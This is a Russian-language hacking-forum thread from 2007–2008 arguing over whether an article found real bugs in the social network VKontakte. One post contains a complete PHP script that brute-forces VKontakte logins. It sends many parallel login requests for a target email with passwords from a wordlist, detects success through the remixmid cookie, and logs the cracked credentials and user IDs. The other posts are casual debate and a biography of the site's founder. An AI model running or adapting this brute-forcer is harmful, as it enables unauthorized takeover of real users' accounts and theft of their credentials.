ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
29.07.2007, 19:44
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
/me не увидел ни одного бага в статье
1) спамер
2) тупость юзеров
3) флудер
__________________
|
|
|
29.07.2007, 21:59
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от lord_of_keyboard
Не-е-е-ет, то что в куке мыло проверяется кука - это ни разу не баг. И то, что ты не зная мыла можешь залогиниться - это тоже. Ага.
Ну как бы я тут как таковых вообще ни одного "бага" не увидел=\
__________________
|
|
|
|
30.03.2008, 06:43
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
разсмотрим..)
PHP код:
#!/usr/bin/php
<?
$mail = "zell@smtp.ru"; // that's mail for brute
define(_dictf,"words.txt"); // file where placed passwords (splited by \r\n)
define(_logfile,"log.txt"); // file to dump results
define(_queue,100); // how mutch thread's start? (for me best results on 200<= threads...)
define(_sock_test_,true); // posible lagging test ( on bad line's ) ;/
/*
define(_proxy_use_)
define(_proxy_host_)
define(_proxy_port_)
define(_proxy_type_)
define(_proxy_login_)
define(_proxy_passw_)
$stat = new statistic(); // not curently realeased (todo)*/
define(_loghead,
"[-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-]\r\n
[................................................................................................]\r\n
[................................................................................................]\r\n
[................................................................................................]\r\n
[................................................................................................]\r\n
[..............................................................].................................]\r\n
[................................................................................................]\r\n
[................................................................................................]\r\n
[................................................................................................]\r\n
[................................................................................................]\r\n
[................................................................................................]\r\n
[-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-]\r\n
_.-x={[Started in ".$stat->start." by unix time...]}=x-._
\r\n\r\n
[-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-]\r\n");
class queue
{
var $_mail;
var $pases;
var $ipass;
var $result;
var $result_i;
var $return;
var $trouble;
var $nbug;
function queue($mail,$pass)
{
$this -> result_i = 0;
$this -> debug_i = 0;
$this -> count_result;
$this -> _mail = $mail;
$this -> pases = $pass;
$this -> ipass = $pass;
}
function getback()
{
return $this -> result;
}
function init()
{
// echo "init()::";
while($this -> getqueue() == true)
{
// echo "Restarting...\r\n";
};
}
function getqueue()
{
// echo "getqueue()::";
list ($return,$trouble,$nbug) = $this -> combine($this -> _mail,$this -> ipass);
$resu = $this -> result_i + count($return);
for ($i = $this -> result_i; $i < $resu; $i++)
{
$this -> result[$i] = $return[$i];
};
if ($trouble)
{
$this -> debug[$this -> debug_i] = "Found trouble.. try to do something...";
$this -> debug_i ++;
for ($a = 0 ; $a < count($nbug); $a++)
{
$ipass[$a] = $nbug[$a];
};
// echo "Rotating...";
};
$this -> nbug = $nbug;
return ($trouble);
}
function c_h($mail,$pass)
{
$ch = curl_init("http://vkontakte.ru/login.php?email=".$mail."&pass=".$pass);
if ($ch)
{
curl_setopt($ch ,CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)');
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1);
curl_setopt($ch, CURLOPT_OPERATIONTIMEOUT, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST,"HEAD");
curl_setopt($ch, CURLOPT_MUTE, true);
};
return $ch;
}
function combine($mail,$pass)
{
$count = count($pass);
$mh = curl_multi_init();
$trouble = false;
$trouble_i = 0;
for ($i = 0; $i < $count; $i++)
{
$conn[$i] = $this -> c_h($mail,$pass[$i]);
curl_multi_add_handle ($mh,$conn[$i]);
}
do {
$mrc = curl_multi_exec($mh, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
while ($active and $mrc == CURLM_OK) {
// wait for network
if (curl_multi_select($mh) != -1) {
// pull in any new data, or at least handle timeouts
do {
$mrc = curl_multi_exec($mh, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
}
}
if ($mrc != CURLM_OK) {
print "Curl multi read error $mrc\n";
}
// retrieve data
for ($i = 0 ; $i < $count; $i++)
{
if (($err = curl_error($conn[$i])) == '') {
$ret[$i]=curl_multi_getcontent($conn[$i]);
} else {
// echo curl_error($conn[$i])."\r\n";
$trouble = true;
$bug = array ($i, curl_error($conn[$i]));
$nbug[$trouble_i] = $bug;
$trouble_i++;
$this -> debug[$this -> debug_i] = "Connection trouble while try: [".$pass[$i]."] trouble is [".curl_error($conn[$i])."]";
$this -> debug_i++;
}
curl_multi_remove_handle($mh,$conn[$i]);
};
@curl_close($conn[$i]);
curl_multi_close($mh);
return array($ret,$trouble,$nbug);
}
};
class statistic
{
var $start;
function statistic()
{
$this -> start = date("U");
}
function stop()
{
$now = date("U");
$now = $now - $this -> start;
return $now;
}
};
$stat = new statistic();
class found
{
var $_mail;
var $pass;
var $id;
var $all;
var $hash;
var $fp;
function found()
{}
function init()
{
$this -> all = 0;
$this -> fp = fopen(_logfile,"w");
fputs($this->fp,_loghead);
}
function show()
{
for ($i = 0; $i < $this -> all; $i++)
{
$var = "--[ ".$i." ]--------------------------------------------------------------\r\n"
. "[|] Email : " . $this->_mail[$i]."\r\n"
. "[|] Passwd : " . $this-> pass[$i]."\r\n"
. "[|] UsrID : " . $this->id[$i]."\r\n"
. "[!] md5hash: " . $this->hash[$i]."\r\n"
. "[+]------------------------------------------------------------------\r\n\r\n";
echo $var;
fputs($this -> fp,$var);
};
}
function add($mail,$pass,$id)
{
$this -> _mail[$this -> all] = $mail;
$this -> pass[$this -> all] = $pass;
$this -> id[$this -> all] = $id;
$this -> hash[$this -> all] = md5($pass);
$this -> all++;
}
};
class statusbar
{
var $onepercent;
function statusbar($full)
{
$this -> onepercent = ( $full / 100);
}
function show($num,$found)
{
// system('clear');
$perc = $num / $this -> onepercent;
$now = "\r[_".round($perc)."%_] [".$found." Founded] [Complete... i'm running...]";
echo $now;
}
};
class parser
{
var $answer;
var $http_answ;
var $found;
var $id;
function parser($answer)
{
$this -> found = false;
$this -> answer = $answer;
$arr = explode("\r\n",$this -> answer);
$this -> http_answ = $arr["0"];
for ($i = 0; $i < count($arr); $i++)
{
if (eregi("Cookie",$arr[$i]))
{
$mycookie = explode(" ",$arr[$i]);
$temp0 = explode("=",$mycookie[1]);
if ($temp0["0"] == "remixmid")
{
$this -> id = eregi_replace(";","",$temp0["1"]);
if ($this -> id != "deleted")
{
$this -> found = true;
};
}
}else{
// $arrs = explode(": ",$arr[$i]);
// var_dump($arrs);
// тут мы можем проверить наличие Location в ответе... воможно будет быстрее чем вышеописаное
}
};
}
};
function do_scan($mail,$obj)
{
$dictf = fopen(_dictf,"r");
while(!feof($dictf)) {$buff = $buff . fread($dictf,4096);};
$pass = explode("\n",$buff);
$bar = new statusbar(count($pass));
for ($word = 0; $word < count($pass); $word++)
{
$bar -> show($word,$obj -> all);
$a = 0;
for ($a = 0 ; $a < _queue; $a++)
{
// echo "$argc[$a] = $pass[$a] \r\n";
$argc[$a] = $pass[$word];
// echo "pass2queue:: [ ".$argc[$a] ." is ".$word." word ]\r\n";
$word++;
};
$bob = new queue ($mail, $argc);
$bar -> show($word,$obj -> all);
$bob -> init();
$array = $bob -> getback();
$c = 0;
for ($c = 0; $c < count ($array) ; $c++)
{
// var_dump($array[$c]); вывести возврат от курла
$f = new parser($array[$c]);
if ($f -> found)
{
$obj -> add($mail,$argc[$c],$f -> id);
};
};
/*
$me = new req($mail,$pass[$word]);
if ($me -> found)
{
$obj -> add ($me -> login, $me -> pass, $me -> id);
};
*/
};
return $obj;
};
function test()
{
echo "[ Prestart testing... ] Resolving www.vkontakte.ru...";
if(!@gethostbyname("www.vkontakte.ru")) { echo "[ Error ]\r\n";exit(); };
echo "[ Ok ]\r\n";
echo "[ Prestart testing... ] Resolving vkontakte.ru...";
if(!@gethostbyname("vkontakte.ru")) { echo "[ Error ]\r\n"; exit(); };
echo "[ Ok ]\r\n";
echo "[ Testing network.... ] (by sockopen())...";
if(!@fsockopen("vkontakte.ru",80)) { echo "[ Error ]\r\n"; exit();};
echo "[ Ok ]\r\n";
echo "[ Testing curl...] ...";
if (!function_exists("curl_init")) { echo "[ Error ]\r\nTry install curl support visit php.net for more information..."; exit();};
echo "[ Ok ]\r\n";
echo "[ Testing curl version... ] ...";
if (!function_exists("curl_multi_exec")) { echo "[ Error ]\r\nTry install newest curl version for more support visit php.net for more information...\r\nCannot run multi thread, exiting...\r\n"; exit();};
echo "[ Ok ]\r\n";
echo "[ All looks like on my linux box... pretty good ;] ]\r\n[ so let's try hack that motherfucker...]\r\n";
echo "[ Testing wordlist file for open ] With fopen() ...";
if (!fopen(_dictf,"r")) { echo "[ Error ]\r\n"; exit(); };
echo "[ Ok ]\r\n";
echo "[ Testing fopen() for write log...] ...";
if (!fopen(_logfile,"w")) { echo "[ Error ]\r\n"; exit(); };
echo "[ Ok ]\r\n";
};
test();
$obj = new found();
$obj -> init();
$obj = do_scan($mail,$obj);
echo "\r\n";
$obj -> show();
?>
|
|
|
|
29.07.2007, 19:50
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме:
1948091
Репутация:
1686
|
|
аргументирую - уже пол года вижу различные флудеры и спамеры для этого сервиса - со всеми вытикающими - я уже молчу об остальных багах на нем
|
|
|
|
29.07.2007, 21:09
|
|
Постоянный
Регистрация: 06.06.2006
Сообщений: 515
Провел на форуме:
1985206
Репутация:
963
|
|
Сообщение от genom--
аргументирую - уже пол года вижу различные флудеры и спамеры для этого сервиса - со всеми вытикающими - я уже молчу об остальных багах на нем
дай ссылку на парочку разных
и баги опиши, можно в пм
|
|
|
|
29.07.2007, 23:19
|
|
Banned
Регистрация: 10.07.2005
Сообщений: 224
Провел на форуме:
1062041
Репутация:
50
|
|
если бы не заключение, то был бы смысл критиковать
|
|
|
|
30.07.2007, 21:20
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591
Репутация:
123
|
|
Слушай, ну если ты не знаешь пароль хрен ты залогинишься, а e-mail не нужен это баг, однако сам по себе он ничего не даёт... Но знать не помешает.
Вообще - интересно есть ли на вконтакте что-нить серьёзное, насколько я знаю в паблике ничего нет... Было бы интересно узнать, как никак 4 по посещаемости сайт рунета
P.S. Сам тестил ничего не нашёл, но я слабоват в поиске багов)))
|
|
|
|
30.07.2007, 21:31
|
|
Постоянный
Регистрация: 09.12.2005
Сообщений: 377
Провел на форуме:
2046072
Репутация:
362
|
|
Хы статья крайне бесполезная и багов там действительно нет.
В любом случае, в контакте не такой уж и прокачанный проект. вот если бы всплыли уязвимости на материнском проекте, тогда другое дело
|
|
|
|
31.07.2007, 12:18
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
Автор сайта -
Павел Дуров известен в рунете как создатель самого крупного студенческого форума и других околостуденческих проектов. Закончил Санкт-Петербургский государственный университет в мае 2006 года. Лауреат стипендии Президента РФ, лауреат стипендии Правительства РФ, троекратный лауреат стипендии Владимира Потанина, победитель олимпиад по лингвистике, информатике и дизайну. С осени 2006 года большую часть времени отдаёт ВКонтакте.ру - Национальному Каталогу Студентов, работа над которым не прекращается ни на один день.
Занимается программированием с 11 лет.
от себя добавлю что он на чемпе мира по программированию занял толи 2ое толи2ое место.. вот и решайте где там могут быть баги )
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
01.08.2007, 00:45
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Сообщение от blackybr
Автор сайта -
от себя добавлю что он на чемпе мира по программированию занял толи 2ое толи2ое место.. вот и решайте где там могут быть баги )
Надеюсь сайт СПбГУ не он поднимал =\
https://forum.antichat.ru/showpost.php?p=365054&postcount=2252
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?426071){kind=avatar}
Похожие темы
Комбинированный вид
